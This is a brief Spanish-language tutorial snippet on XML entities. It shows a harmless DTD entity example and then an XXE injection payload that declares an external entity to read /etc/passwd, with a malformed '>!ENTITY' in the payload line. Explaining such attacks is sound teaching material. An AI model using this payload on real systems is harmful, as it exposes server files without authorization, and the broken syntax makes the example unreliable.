Ejemplo de estructura XML:
<!DOCTYPE replace [<!ENTITY name "john">]>
<userInfo>
<firstName> Falcon </firstName>
<lastName> &name; </lastName>
</userInfo>
Explotando el uso de Entidades:
<!DOCTYPE root [>!ENTITY read SYSTEM 'file:/etc/passwd'>]>
<root> &read; </root>
